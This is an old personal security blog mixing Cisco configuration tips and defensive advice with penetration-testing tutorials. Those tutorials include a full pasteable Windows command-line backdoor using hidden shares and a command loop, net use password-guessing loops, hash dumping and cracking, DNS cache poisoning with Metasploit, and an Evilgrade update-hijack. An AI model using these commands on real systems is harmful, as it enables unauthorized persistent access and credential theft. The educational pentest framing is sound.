Infosec Samurai

Lightning Tip Gnome Connection Manager

2010-12-08T17:32:00.000-05:00

I typically find that most Cisco admins run Windows or Mac. I am partial to Linux I love the stability but I never found anything that could compete with SecureCrt on Windows or Mac computers. I recently found Gnome Connection Manager which is very comparable to SecureCrt plus it's free! Gnome Connection Manager supports telnet, ssh, tabs and will automatically enter usernames and passwords. This is a very powerful addition for Cisco Admins who run Linux. Check out gnome connection manager and give Linux a try I'm sure you will like it.

Lightning TIP Viewing Traffic as it Crosses a Router

2010-11-29T13:23:00.001-05:00

Do you have a need to see the packets crossing your router? If you do then you can use the debug ip packet detail command to see this traffic. The problem is it's typically so much traffic it's not useful.This is where an access list can help.

access-list 101 permit ip host 192.168.0.1 host 192.168.0.2

access-list 101 permit ip host 192.168.0.2 host 192.168.0.1

Now reuse the earlier debug with the access-list.

Router#debug ip packet detail 101

If you tweak your logging settings just right you should be able to capture the packet detail to syslog or to the console in real time giving you insight into the specific traffic you might be looking for.

Back in Black

2010-11-29T12:34:00.001-05:00

Hello everyone. I have returned ! I will be writing more often about topics in tech that interest me. This blog won't have the specific focus of Information Security or Cisco like it has in the past. It will be loosely based on Technology, Information Security, Hacking and whatever else I feel like writing about. If you are reading this Thanks for your support.

Auth Proxy without a Cisco ACS server on an ASA

2009-07-28T10:17:00.023-04:00

Does your organization have Active Directory? Do you have a Cisco Router or ASA? You can do authorization proxy or cut-through proxy to your Active Directory without having an ACS server. How? I will show you.

You will need at least one windows server and a Cisco ASA or Router.
First we will go to the Windows Server. This server must be part of your Active Directory and be preferably Windows Server 2003 or later.

Installing IAS server

Log in as an Administrator
Go to Start > Control Panel > Add or Remove Progams
Click Add/Remove Windows Components
Scroll through the list and Click Networking Services
Click Details
Check the box next to Internet Authentication Service
Click OK
Then Next and Finish

The system may ask you to insert your Windows Server 2003 CD, so have it handy. To verify that it is installed Go to Start > Administrative Tools > Internet Authentication Service.

Configuring IAS for AD

Now we want to configure our IAS server to allow radius authentication of the Active Directory Group we are going to create. To do this we need to complete the following steps.

Go to Start > Administrative Tools > Internet Authentication Service
Right Click on the Internet Authentication Service in the top left of the Window
Choose Register Server In Active Directory
Choose OK on the First Message that allows the Server to read the dial in permission on the users from AD
Choose OK on the Message that follows the first message.

Add your device to the IAS Server

We now want to add the Router/ASA to the IAS Server. To add it we do the following.

Right click on the Radius Clients Folder
Choose New Radius Client
Enter the Friendly Name and the IP address or FQDN Click Next
Leave the Default RADIUS Standard in Client Vendor Enter the Shared Secret Confirm it and choose Finish

You should now see a Device in the Right Pane of the Window

Edit your Remote Access Policy
We now want to add a Remote Access Policy that will give our group permission to authenticate to our devices. To do this we add a remote access policy.

In the Internet Authentication Service window, click Remote Access Policies in the left pane.
In the right pane, right-click the default policy, and select Delete.
Right Click on Remote Access Policy
Choose New Remote Access Policy
Choose Next
Click Set Up A Custom Policy, name it Cisco-Auth
In the Policy Conditions Window Section add your Windows Group from Active Directory
Choose Next
Choose Grant Remote Access Permission
Choose the Edit Profile Button
Choose the Authentication Tab uncheck all options then check Unencrypted Authentication
Click the Advanced Tab
Remove the Framed-Protocol Radius Standard PPP
Choose Service-Type Radius Standard Framed entry click edit
Change the Attribute Value to Login click Ok
Click Add Click Vendor Specific Click Add choose Cisco, then Yes it Conforms and Configure Attribute
Add the string shell:priv-lvl=15 or change the number to whatever privilege level you want your users to be.
Click ok and ok and ok and close.

AAA Radius Authentication setup
Ok thats enough windows so lets get going on our ASA with the following commands

ASA(config)#aaa-server RADIUS protocol radius
ASA(config)#aaa-server RADIUS (inside) host IPofyourhost password
ASA(config-aaa-server-host)authentication-port 1812
ASA(config-aaa-server-host)authentication-port 1813

Then you want to test your AAA setup
ASA#test aaa-server authentication RADIUS username yourusername password yourpassword

It will then ask you for a host IP if everything is setup correctly you will get
INFO: Authentication Successful

Setup Cut Through Proxy

First we create an acl to define what we want to be authenticated.

ASA(config)#access-list cut-through permit ip 10.0.0.0 255.0.0.0 any eq 80
ASA(config)#access-list cut-through permit ip 10.0.0.0 255.0.0.0 any eq 443

Then we configure the authentication
ASA(config)#aaa authentication match cut-through inside RADIUS

So thats it! We just saved our company some money by not needing a Cisco ACS for Auth-Proxy/cut-through proxy. We still don't get the advanced features of the ACS but we do get a free Authentication Server. If you want to do this same thing on a router just use something like this.

aaa new-model
radius-server host 10.0.0.1 auth-port 1812 acct-port 1813 key
aaa authorization auth-proxy default group RADIUS
ip http server
ip auth-proxy name security http inactivity-time 60
interface f0/0
ip auth-proxy security

You can use the Radius Server we just created for login authentication as well but make sure you are using a crypto IOS and SSH or you expose your windows passwords over telnet which weakens the Windows domains already encrypted infrastructure.

CCIE Security July 23rd 2009

2009-07-23T14:54:00.009-04:00

Alright I am adopting the mantra of “It doesn’t matter how slow you go it only matters if you stop” I have been banging on the CCIE Security since the beginning of the year and I am starting to get to a point where I feel there isn’t a ton of study material available. The material I have from IPEXPERT is first rate but I am beginning to think I picked a real bad time to start studying for a CCIE in Security. I haven’t been exposed to the lull in material after a blueprint change in any other type of certification I have pursued.

I have on the other hand done some of the new labs from IPExpert they are of much better quality than that of the previous ones. I have been working on LAB1A all this week and I think I learned quite a few things about the ASA especially MPF. It’s really cool that you can change HTTP headers for webservers using MPF. You can make your server header say anything you want like the following.

policy-map type inspect http MAP_HTTP
parameters
spoof-server “This Server runs on Caffeine!”

I know that if I keep going on my path to CCIE I will get there! I am sure in a few more months more study materials will appear but it just seems like they are extremely sparse right now. I guess that the number of CCIE in Security is such a low number that it might be hard to get study material written. The R&S CCIE won't be like this I am sure.

Attack Script Part 1

2009-03-13T08:51:00.006-04:00

First off let me say that I am going to start posting shorter blogs more frequently. I guess I have been kind of inspired by twitter. Instead of one giant post every month I am going to try to post several smaller posts. I am also going to be using this blog as a sounding board for my upcoming CCIE Security Lab studies. I am going to write down what I encounter and see if anything strikes any readers out their on the net.

We are going to create a back door that we can use over windows file sharing. It will allow you to run any command and have it's output exported into a file. This is an add on to Ed Skodus's for loop that allows this to happen.

So let's say we have popped a shell out of a windows box. Ok pentest is over right? Wrong! we need to use this box as a pivot point to try to go deeper into the network. So what can we do to keep access to this system without introducing any new software into the system?

We start with creating a couple of folders. We want to create these folders in a somewhat inconspicuous location. I usually choose C:\windows\system. So the commands to do this are

mkdir C:\windows\system\input
mkdir C:\windows\system\output

Next we want to hide the two folders. We want to make these folders hidden and system folders. That requires them to unhide both hidden files and protected operating system files to see the folders. To do this we use the following commands.

attrib C:\windows\system\input +H +S
attrib C:\windows\system\output +H +S

Now we want to share the two folders. To do this we use the net share command but we want to share these files with a dollar sign at the end to make sure they aren't visible on the network.

net share input$=c:\windows\system\input
net share output$=c:\windows\system\output

Now the next step is up to you and your rules of engagement . What we want to do is control access to these shares. The easiest way is to give the folders the everyone permission but this might introduce new vulnerabilities into the system. It might be prudent to create a new user on the system and then give that user permission to these folders. It's up to you but for the sake of the example we will use the everyone permission.

echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

Next we turn on simple file sharing to make windows share these files the way we want it to. We do this with some netsh fu.

netsh firewall set service type = FILEANDPRINT mode = ENABLE

We now want to dump a command in our commands.txt file. This will be what we echo into to run commands through the backdoor. We want to dump a sample command to this file to make sure our loop is successful. The command is:

echo ipconfig /all > c:\windows\system\input\commands.txt

Now we finally set our loop in motion. This loop takes the commands from commands.txt runs them and then dumps the output to output.txt. The loop looks like the following.

for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output\output.txt & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1

I know this looks like someone threw up on your command line. It works though!! What it does is looks for the commands.txt file. It then reads the file runs the command in the file and deletes the file. It then dumps the output to the output.txt file. It does this every two seconds. So what we have is the following script that can be pasted into a shell.

'make them
mkdir c:\windows\system\input
mkdir c:\windows\system\output

'hide them
attrib c:\windows\system\input +H +S
attrib c:\windows\system\output +H +S

'share them
net share input$=c:\windows\system\input
net share output$=c:\windows\system\output

'allow everyone into them
echo Y| cacls c:\windows\system\input /P everyone:F
echo Y| cacls c:\windows\system\output /P everyone:F

'enable simple filesharing
netsh firewall set service type = FILEANDPRINT mode = ENABLE

'dump a sample command into commands.txt
echo ipconfig /all > c:\windows\system\input\commands.txt

'Use Ed Skodus's for /L loop
for /L %i in (1,0,2) do (for /f "delims=^" %j in (c:\windows\system\input\commands.txt) do cmd.exe /c %j >> c:\windows\system\output & del c:\windows\system\input\commands.txt) & ping -n 2 127.0.0.1

So you can now copy out the above text and paste it into your shell. If you want to make this a batch file make sure that you change all of the % symbols in the loop to %% then it will work as a batch file.

To make sure it's working after you start the loop use the following command.

type \\(ip-address)\output$\output.txt

You should see the output of ipconfig /all on the screen.

To run a new command we use the following:

echo (command) > \\(ip-address)\input$\commands.txt

Ok so that's it a quick simple and dirty windows command line backdoor.

In the next post I will write a script that uses WMI to copy over any payload you want and the run it. You can use runas command and run the script as a user that you have already compromised. You can then turn the above script into a batch file and run it without having to pop a shell on the machine.

The Return of Wardialing

2009-03-07T07:43:00.013-05:00

Wardialing is kind of a lost art in the hacking community. Some of us used THC-SCAN or ToneLoc back in the day to dial out as many prefixes as possible trying to find a low security backdoor into systems. With the inception of VOIP this skillset has come back into play and is a really valid skill for penetration testers. You would be shocked at how many organizations still use dial in for systems administration. I have seen routers with modems directly connected to console cables and tons of embedded devices with modems still hanging off of them. In this post I will show you how to Wardial with two different tools.

The first tool was a paid commercial tool but is now a free tool. This tool is SecureLogix TeleSweep. It requires SOUL SUCKING REGISTRATION but it's a good free Windows War dialer. If you don't want to register our second tool is an Open Source tool so just read on.

First you need to download SecureLogix Telesweep. You can register and download the tool here
http://www.securelogix.com/modemscanner/tss_agreement1.htm

Once you have downloaded the application you can unzip and install it. This installs just like any other windows application and shouldn't be a problem for anyone familiar with windows. The next step is to execute the dialer configuration tool. Telesweep is a distributed application so it allows you to have several dialers report back to one manager. Walk through the wizard and setup your modem and enter the license that was sent in the email from securelogix. Make sure your modem is recognized by scanning for it.

The next step is to open the Telesweep secure management server and license it. Then it will open a profile and show you computers that are attached to the management server. This allows you to connect several machines and then run them all against a prefix.

Once open you can double click on the sample profile. This will show you some of the power of this tool. You can dial numbers you can also give it a list of usernames and passwords to try against a target once it has detected a carrier. So this tool will dial try to automatically penetrate and then give a report of what it has done.

All in all this is a great tool for stand alone war dialing but in combination with the next tool we are going to discuss it becomes even better for targeted attacking because of it's penetration ability.

The next tool we are going to talk about is a new one from the venerable H D Moore. Anyone who doesn't know who H D is probably shouldn't be reading this blog. H D is a personal hero of mine and has built the absolute best open source exploitation tool Metasploit. His new tool is called WarVox. WarVox allows you to leverage VOIP providers to execute your wardialing attack and then it records it's results in sound files. It's a new spin on wardialing but
allows you to have great speed.

So let's install WarVox. You need linux for WarVox I will be doing the install on BackTrack 4 but you can also use Ubuntu. I will be using the svn version if you prefer to use a stable tar file they are available for download.

Open a command line in your Linux Distribution and type in

sudo apt-get install build-essential libiaxclient-dev sox lame ruby rake rubygems libsqlite3-ruby gnuplot

This will take care of all of the dependancies needed for WarVox.
Next we want to install mongrel to improve the speed of WarVox. Use the following command to do this

gem install mongrel
Next we want to download warvox so we use:

svn co http://metasploit.com/svn/warvox/trunk/
We probably want to rename the directory to something more descriptive after downloading it. I renamed it to WarVox by using the following:

mv trunk WarVox
Next we enter into the WarVox directory and type make
If everything makes correctly you will be greated with the following text:
Finally we start WarVox with the following:

bin/warvox.rb
Then we browse to 127.0.0.1:7777 if everything worked out we will be greeted by a username and password. The default username is admin and the password is warvox. You can change these by editing the warvox.conf file. Then we get a nice web interface:

After the installation of the program you can set it up with a service provider and begin Wardialing. The beauty of this program is it's speed and ability to fingerprint a line such as a fax, voice etc. If you use these two programs I have shown in combination it will give very good wardialing results in a very short period of time. Use WarVox first then put the results into Telesweep for further drilling down your targets. Both of these tools together can give a very lucrative WarDailing experience. In a world of VOIP wardialing should be a part of every VOIP penetration test.

Automated Malware Analysis with Zerowine

2009-01-04T09:23:00.017-05:00

I recently did some work with Zerowine a Web/Debian based automated malware analysis tool. My efforts got me a little writeup on the Internet Storm Center.

This is a followup post to show all of the steps I took to get this tool going in Vmware and it's default QEmu. This post illustrates a Windows configuration but will still work on Linux for the most part.

The first step we need to take is to download Zerowine. You can download it here. This comes as a prebuilt QEmu image.

The next step is to download Qemu for windows. You can download it here.

Once you have both of these files and have extracted them both you will need to try and run the Virtual Machine. (If you don't want to run this in QEmu at all skip the next paragraph)

To call a QEmu virtual machine you use a batch file. QEmu is somewhat like Dynamips for those of you who are familiar with this type of Virtual Machine usage. We will need to create a batch file to call the qemu.exe. This batch file will vary from computer to computer. Specifically my batch file has this line to run the Virtual Machine. This should run zerowine with QEmu.

qemu.exe -L . -m 128 -hda C:\zerowine_vm\hda.img -redir tcp:8000:10.2.0.15:8000

I wanted to use VMware so what I did is convert the image file to a .vmdk format and use it with Vmware. Luckily we already have the tool we need to do this. qemu-img.exe can convert .img files to .vmdk. So the command we use to do this is

qemu-img.exe convert c:\zerowine_vm\hda.img -O vmdk c:\zerowine_vm\zerowine.vmdk

After a few minutes a .vmdk file should appear in the directory you specified. Now it's time to create a new virtual machine and attach the zerowine.vmdk file that we just created.

To start we open Vmware workstation and choose File>New>Virtual Machine. Then you choose Next then Custom and Next 2 times. Then choose Linux and Other Linux 2.6.x kernel.

Then Next through until you reach the networking section. In the Networking section choose NAT networking. Then Next twice and you will get to the Select a Disk section. Choose use existing and point this at our .vmdk file that we created earlier. After this finish the Virtual Machine wizard and boot it up.

Ok so now we have a booting image of zerowine. We have a few steps left. The first step is to change the keyboard map then we need to change a file to get eth0 to come up correctly. To do this login as root with a password of zerowine. Then type

dpkg-reconfigure console-data

walk through this wizard and change your keyboard map to pc us standard then use the following command

vi /etc/udev/rules.d/z25_persistent-net.rules

Then delete all lines in this file. This will allow you to reclaim your eth0 otherwise if you opened this file in qemu previously it might not register your eth0 in ifconfig.

Then in the VMware window choose Edit>Virtual Network Settings. Then choose the NAT tab. Then choose the edit button. Then the Port Forwarding button and finally the add button. Enter the host port of 8000 and the ip address of the virtual machine and then port 8000. If you don't know the ip of the host enter the command ifconfig eth0. This will give you the IP address of the virtual machine.

Finally enter 127.0.0.1:8000 in a browser and you will get the zerowine web interface. It should look like the following.

Thats it then, we have a cool incident response and malware analysis tool working in VMware. The reports aren't bad and it does unpacking as well. I hope newer versions expand on the functionality of this tool.

Cisco Router Rootkits

2008-12-16T18:17:00.019-05:00

Core Security's Sebastian Muniz demonstrated that a rootkit could be installed on Cisco routers earlier this year. Since this point I have been thinking of possible mitigation techniques for this type of problem. Like any type of rootkit mitigation is only possible after detection. So how do we detect a rootkit on a Cisco Router? I am going to outline some different techniques to help identify and verify an IOS image.

The first technique is a very basic one logging. So logging how do we do that? In a local network where you aren't worried about encryption then using syslog is a viable solution. We do this by using the following commands.

Router(config)# logging on
Router(config)# logging host x.x.x.x

With logging on now we know what is happening to the router. We can now see if it is being attacked and if someone logs in and also most importantly track configuration changes. Speaking of tracking configuration changes how do we do that? Another couple of commands can do that for us.

Router(config)#archive
Router(config-archive)# log config
Router(config-archive-log-config)# logging enable
Router(config-archive-log-config)# logging size 200
Router(config-archive-log-config)# hidekeys
Router(config-archive-log-config)# notify syslog

With this configuration in place we can see any configuration changes logged right to syslog.This can help us to see if an attacker makes a change to the system

The verify command allows us to verify files on the router and to make sure that the MD5 hash matches what Cisco provides.

I would recommend that if you really think you have a rootkit on your router that you transfer the IOS image off of the router and verify it externally using a md5 hash verifier.

The verify command allows you to verify the hash of a file contained on the router. It works like the following.

Router(config)#verify /md5 filename

If you see that the hash doesn't match then you should change the image for one that has a correct md5 sum.

Last but not least is the secure command or the Cisco IOS Resilient Configuration

This little known command allows you to store an image of the IOS and the configuration on the router in an area not accessible to any user.

To configure this you must make sure that you have at least an IOS greater than 12.3(8)T. Then use the following commands:

Router(config)#secure boot-config
Router(config)#secure boot-image

This set of commands allows you to store a known good config and IOS in the router which can be restored in ROMMON mode. To verify that worked you can use the following command

Router#show secure bootset

In short the commands and techniques that I have outlined can help you verify that your IOS image is a known good file. Which guarantees that there isn't a rootkit installed on your router. The odds of this type of attack happening are slim to none but you should be able to verify this as part of Incident Response.

Smashing the Hash

2008-11-22T20:55:00.006-05:00

In today's post we are going to talk about stealing password hashes and then recovering the passwords from them. Here is the scenario, we have popped a windows box with an exploit and we have administrator access. Now we want some passwords. The easiest way to do this is to steal the hashes. To get the hashes we will need a tool to extract them. One of these tools is fgdump.

You can get fgdump here

We can run fgdump on a remote host by running

fgdump.exe -h 192.168.0.10 -u Admin -p AdminPass

This will give us a text file with a .pwdump extension. If you open this file in notepad you will see a file showing some usernames and some password hashes following them.

After this step we need a password cracking tool. My favorites are John The Ripper and Ophcrack. John is a really good multisystem bruteforcing tool, Ophcrack is a great rainbow table tool. In this example we are going to use Ophcrack.

We open ophcrack and it looks like the following.

We then hit the load button and choose pwdump file. Then we point to the file created by fgdump. We then hit the crack button. Ophcrack will spit out the password after a period of time.

I usually like to run ophcrack and john in tandem because sometimes john will break a password faster than ophcrack.

So that's it. You can now reuse the user names and passwords you cracked on other systems. If this is domain controller then the pentest is over because you just owned the domain.

Unpacking UPX with Ollydbg

2008-10-18T21:55:00.017-04:00

I recently participated in the malware challenge 2008 at http://malwarechallenge.info Spoiler Alert if you are taking part in this challenge don't read any further. I am giving away some secrets.

In the following post I will illustrate what steps should be taken to do low level analysis of malware. This is what is done before behavioral analysis.

The first thing you need to do is to take a look at the strings in the executable. This can be done in several different ways. The easiest way is to use the strings command in Linux or Cygwin and export the strings to a text file by using the

strings malware.exe > strings.txt.

At this point if you look at the strings and see all of the text in the clear the executable is probably not packed or obfuscated. This isn't the case most of the time. Usually the malware is packed using a packer and possibly a protector to prevent reverse engineering of the malware.

If you look through the strings and they all seem obfuscated or strange looking then it's probably a packed portable executable file. So how do you really know? We use a tool called PEiD. PEiD is a tool that can easily tell if an executable is packed. The first step is to get PEiD from http://peid.has.it/ Once we have downloaded PEiD we open it and it looks like this.

We then hit the button with three dots in the upper right hand corner. This lets us browse to our executable. In this case our executable is named malware.exe. We point to the executable and then hit open. Once open it will try to detect the packer. In the case of this challenge it will only report correctly if you change the mode to deep or hardcore. It will then show something like the following image.

Notice we are now reporting the malware is packed with UPX. Ok so lets unpack the UPX. If you try the upx packer tool it will report that the executable can't be unpacked. This is pretty typical, it means that the UPX in the executable is obfuscated or it's so old the unpacker doesn't understand it. So what now?

Enter Ollydbg. Olly is a great tool for analysis of malware. Olly can be used for all sorts of reverse engineering fun but in this case we are going to use Olly for unpacking the malware. Before we start we also need the Ollydump plugin.

To unpack the UPX we first open Ollydbg. Then we choose open and the executable file we are trying to analyze.
Once open we scroll down until we find the PUSH AD instruction. This is the beginning of the loading of the program into memory.
Next we scroll down and find the POP AD instruction. Then we set a breakpoint on the POPAD instruction by right clicking and choosing breakpoint.
Then we hit f9. It will then break on the POP AD instruction.
Then we hit F7 several times until we see it hit a JMP instruction. if you look at the hex address next to this statement this is our OEP or original entry point.
Write down the address next to the JMP instruction
Then open the plugins menu, Choose Ollydump then change the size to the last 5 digits of the OEP. Make sure you check rebuild import, finally hit dump then give the executable a name. See below.
Try running the executable to make sure it works.
If it runs then you have successfully unpacked the UPX.

Alright so there's no more UPX on this executable. Now we can use the strings command again and we should see several more strings. Including the commands to control an IRC bot. Once you have those commands you can find out just how dangerous a botnet can be.

Windows Command Line Kung Fu

2008-10-03T17:55:00.006-04:00

So I know this doesn't apply to all security professionals but if you are a pen tester you might find this useful. Here is the situation. You have hacked a windows box and you have a command shell but your Rules of Engagement say you can't install any software on the compromised machine.

What do you do to try to get an attack going from that box without adding any software. The answer is some command line kung fu. We can use some windows command line tricks to make this machine give us useful information to continue our attacks deeper.

First we should do an ipconfig/all and get the information from that command. The do an arp -a and look at the arp table. After that doing a route print is a good idea.

If you want to go further and use the host to get more information you can do so with only the command line. The trick to this is to use some creative for loops.

for /L loops are counter loops. They count out a number and stop
for /F loops iterate over a file.

I want to enumerate other hosts from the compromised box. We already have the subnet from our earlier ipconfig /all. We then put this command into the command shell with our subnet.

C:\for /L %i in (1,1,255) do @ping -n 1 10.0.0.%i | find "Reply"

What this does is uses a for /L loop which counts by 1 from 1 to 255 and pings each ip 1 time and then pipes this to the find command and finds anything with a Reply. Beware that the Reply doesn't work well in Vista and you may have to us "bytes=" instead.

If you want to use this in a batch file and output the results you can use this command.

for /L %%i in (1,1,255) do @ping -n 1 10.0.0.%%i | find "Reply" >> replies.txt

This will enumerate all of the IP's and export it to a file called replies.txt. For batch files you must use a double percent and >> for output.

Ok so now I want all the names of the devices on this subnet.

for /L %i in (1,1,255) do @nslookup 10.0.0.%i 2>nul | find "Name" && echo 10.0.0.%i

This for loop counts by 1 from 1 to 255 the does an nslookup for each ip. It outputs error of 2 to nul. Then it finds anything with Name and echos the IP of each name. The double && means only execute if the first on succeds.

Alright so we know the IP addresses and names and we want to guess a password can we do that. Sure we can!

for /f %i in (password.lst) do @echo %i & @net use \\[target_IP_addr] %i /u:[Username] 2>nul && echo Username: %i >> success.txt

I won't explain this since it builds on previous examples. How about a username and password guesser? This is an extremely useful tool but you really should figure it out yourself.

for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.254.83.1 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\[target IP] /del)

So how about that we just created some useful tools only using the command line. How cool is that. I can't take credit for this though. These tricks come for Ed Skodus of SANS fame I have changed them a bit but all credit should go to Ed.

Antivirus is Dead. Now What?

2008-09-21T07:25:00.006-04:00

I keep hearing people in security news saying "ANTI VIRUS IS DEAD". This is somewhat true that signature based anti virus has become too slow to respond to some of today's security threats. The question for most people now is "OK so anti virus is dead what do I do about detecting malware?"

The answer to this question is defense in depth. I am going to explain some devices that can help you catch zero day worms or attacks that anti virus might not stop.

Network Based IDS/IPS. This technology helps in the fight against hackers, and malware, It also does a good job with policy enforcement and getting an overall view of network traffic.

The best open source IDS is snort and its snort inline variant. These allow you to create a very powerful open source IDS/IPS. If you want to implement this Hakin9 magazine has a good article here.
The next solution for defending against malware besides anti virus is a HONEYPOT. Low interaction honeypots do a good job of catching malware, spam and other attacks. These types of honeypots are easy to deploy and can give you an edge on worms that try to exploit system vulnerabilities.

My favorite low interaction honeypot is Nepenthes. This honeypot is ridiculously easy to deploy on any modern Debian based Linux system. It will also automatically submit any binaries that it catches to the CWsandbox and Norman Sandbox. This can give you a jump on incident response by giving you automated malware analysis.
Number three on this list is much harder. This involves having someone in your organization who knows how to do MALWARE ANALYSIS. This isn't an easy task and is somewhat of an art. It is important to know how to use tools like VMWARE, IDA PRO, SYSINTERNALS TOOLS, REGSHOT, OLLY DBG, and more.

SANS institute teaches 5 day courses on malware analysis in their GREM certification program. I will do a malware analysis post here in the near future.
The fourth and final step is Controlling Access to your network. Don't let just anyone connect to your network. think of your network like a Medical Operating room. Make sure that all of your devices are malware free and fully patched. Setup internet access policies that allow you to remove internet access from sensitive devices. Air Gap or VLAN any publicly available networks and treat them like DMZ's. Don't let people use USB thumb drives without knowing they are clean before using them in your internal network. If you treat malware like a human virus infection you will have less chance of being infected.

In conclusion if anti virus is dead "which it really isn't" then we have several other lines of defense to prevent malware from spreading wildly through our networks. Using good defense techniques will keep your data safe even if anti virus fails.

The CIA Security Triad, Availability

2008-09-05T16:57:00.008-04:00

With the recent vulnerabilities released against Cisco PIX/ASA, I started thinking about network Availability and the security of technologies in relation to this. First off in the design of a network you need to think about and plan for failures. Most failures are related to power connectivity or some kind of failure including security issues like DOS attacks.

In the Cisco world their are several methods to accomplish High Availability.

Failover is one method. This can be done with Cisco routers or ASA devices. This is where when one device fails another one picks up right were it left off. This is especially good in a security situation where one device is the victim of an attack.

A configuration example of Failover for the ASA can be found here.

A good configuration example of HSRP in Cisco routers is here.

Floating Static Routes are hard coded second path routes. When a dynamic or static route fails it will pick up the hard coded route and route all traffic through that circuit. This is good backup when a circuit fails. Failover is accomplished by adding a static route to the system with an extremely high administrative distance for example.

ip route 192.168.4.0 255.255.255.0 172.16.4.1 175

The administrative distance of 175 prevents it from picking this route until one with a lower administrative distance has failed. Since most people use EIGRP or OSPF an administrative distance of 175 is much higher than the 90 for EIGRP and the 110 for OSPF. This means the routing protocol must fail and then it will use the static route.

Mesh Connectivity is a type of connectivity that each circuit has multiple connections to other devices. This allows dynamic routing protocols to route around failures and is especially important in backbones to make them failure resistant.

Out of Band Management allows you to have complete control of your devices without having to use the data connections. Cisco has the ability to do this kind of connectivity with a router acting as a terminal server and connecting that router to the console ports of all other Cisco devices using an octal cable. This connectivity can be done over telnet or ssh. SSH makes this one of the most secure and foolproof ways to access a Cisco device when a failure has occurred.

To get a good example look here.

and here.

This type of access can also be accomplished using a modem. This method can allow out of band management on devices that are not in your normal location. This a great option and can improve the security of devices because inband management is not needed which eliminates issues with protocols like telnet, ssh and SNMP which are used to manage systems.

In conclusion doing a little thinking when designing your network can make for a much more secure and resilient network. This is especially important when your network is a converged network that runs VOIP and Video applications that require up time.

Evilgrade Will 0wn Us All

2008-08-04T17:40:00.020-04:00

In today's post we are going to explore a very interesting type of man in the middle attack that allows a client side attack to occur through an unsigned automatic update process. This attack can happen through several different upgrade applications. In this case the attack is very complex as it involves DNS cache poisoning using Kaminsky's DNS vulnerability or a man in the middle attack using Ettercap.

The first tool we will use in this attack is the Metasploit framework and the Metasploit DNS attack called the bailiwicked attack. We talked about how to execute this attack in the last post. So lets start with that.

First we have to make sure that the DNS server is vulnerable you can do this by using the check option in the exploit or doxpara.com. It is also important to run an nmap scan and make sure the server is an ISC Bind DNS server.

Next we then want to poison one of the domain names that evilgrade uses. There are several different domains. Probably the least noticable would be itunes.com or java.sun.com. The first stage of the attack is to use the bailiwicked domain attack and spoof java.sun.com to the IP address of our server which is hosting evilgrade.

We then start evilgrade by executing evilgrade which will look like the following.

Next we enter configure sunjava and then show options.

Then we get the screen above.

Now we type set agent and the location of our payload. Like this

set agent /root/nclistener.exe

We can launch the attack now or change more of the settings using the set variable. After this we launch the attack by using the start command.

The next time the users software checks for an update it will download our NetCat listener. Most users apply updates without looking so you should at least own a PC or two from this.

To see full details of this exploit take a look at this video

Countermeasures

To counter this attack we have to defend against the initial attack vector. To do this we must stop DNS spoofing, ARP spoofing and DHCP spoofing. Defending from these attacks entails patching your DNS servers and turning on DHCP snooping and ARP inspection on your switches.

You can look at my previous posts to see how to turn on DHCP snooping and ARP inspection on Cisco Catalyst switches. Otherwise, make sure you patch your DNS servers as the DNS servers have the largest attack surface.

Greased Lightbox - Update available (v0.17)

→←+-↻

Loading image

Click anywhere to cancel

Image unavailable

Bringing Balance to Kaminsky's DNS Poisoning Vulnerability

2008-07-28T18:55:00.031-04:00

Ok, so the security community is a buzz about the DNS flaw that was found by Dan Kaminsky of IOactive. ISACA is having a special webcast about it. Internet Storm Center is running stories about it. People are scared which I find funny. Yet a healthy dose of paranoia in the security world is a good thing.

In today's post we will be exploring just how easy it is to exploit the recent DNS flaw that was released by Dan Kaminsky. This will explain why you see security professionals running around like chickens with their heads cut off. This flaw essentially allows the user to overwrite an already cached domain or host in a caching DNS server. This is basically DNS cache poisoning but in a new way.

For more information on how this works look here. and here

So how easy is this to exploit? Way to easy, if you follow the steps in this post you will be able to execute this attack.

Go to metaploit.com and download metasploit framework3
Install it.

You will want to run svn update to get the latest exploits.

After the update runs open msfgui it should look like this
Type DNS in the bar and hit find. After a minute or two you will see DNS bailiwicked_host and DNS bailiwicked_domain
Right click on either of these exploits and choose execute. This will bring up the MSF assistant which looks like below. Fill in the fields and then hit next and start.
The exploit tells you whether it succeeds. Just hope it fails if it's one you administer.

It's that easy, you just made everyone's www.yahoo.com resolve to your blog see how elite you are :-P.

The real danger is having this redirect a site to a client side attack and then using that as a jump off point for a serious compromise.

Countermeasures

In this instance it sucks to be a defender which most of us are. Microsoft actually made it easy on us this time with a patch that came out earlier this month. There are updates for BIND as well. You can also turn off recursion or forward to open dns. You can also check if you are vulnerable here

This can still be undone by NAT routers and firewalls that act as DNS servers or intercept DNS traffic. Namely Cisco Routers acting as DNS servers. I don't know why you would use this function but if you do upgrade your IOS. The source ports are still an issue with all Cisco products as of this writing please upgrade when patches are available.

So now we have fully explored this attack and how to prevent it. I am sure that this post shows just how simple it is to be a script kiddie hacker and just how much trouble you can cause those of us in the security field. This is a great example of why Offensive Security is something that all security pros should learn. Learn the attacks learn how to hack so you can prevent.

Greased Lightbox - Update available (v0.17) - Update available (v0.17)

→←+-↻

Loading image

Click anywhere to cancel

Image unavailable

Greased Lightbox

→←+-↻

Loading image

Click anywhere to cancel

Image unavailable

Then Yin and Yang of the Brute Force Attack

2008-07-23T15:00:00.014-04:00

In today's post we are going to talk about Brute Force attacks against devices. Brute Force attacks are basically when we randomly guess user names and passwords on a device until we correctly hit the user name and password combination.

The trick with this type of attack is making sure that you target the attack for what you are attacking in a very specific manner. In other words use a dictionary that has words created for your target to make it much more effective. We have a tool that can automatically create dictionaries for us. This tool is called Wyd. Wyd is a perl script that was created by the people at remote-exploit.org. To download it go here. Wyd is designed to pull passwords from .DOC, .XLS, .MP3, and other file types and create dictionaries that are specific to the target.

In this example we are going to pick a website and generate a dictionary file. We will use this blog for an example.

First step is to get the website.

wget zen-security.blogspot.com

This gives us an index.html file. Then we use wyd to create the dictionary file by doing the following commands.

./wyd.pl -o output.txt index.html

Now we have a dictionary file based on the words found on this page. We can then feed this into our next tool to use as part of the Attack. The next tool we are going to discuss is the THC-Hydra. This is probably the best brute forcing tool available it has tons of different options and many different protocol types. It also has a GTK GUI version which we will be showing here.

To open Hydra we launch xhydra and it looks like the following.

